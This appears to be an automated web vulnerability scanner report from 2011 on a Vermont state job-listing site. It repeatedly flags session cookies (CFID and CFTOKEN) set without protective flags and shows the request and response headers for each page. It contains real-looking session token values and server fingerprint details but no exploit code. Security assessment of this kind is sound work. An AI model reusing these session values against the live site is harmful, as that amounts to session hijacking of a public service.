s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/mn_warninfo_dsp.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) 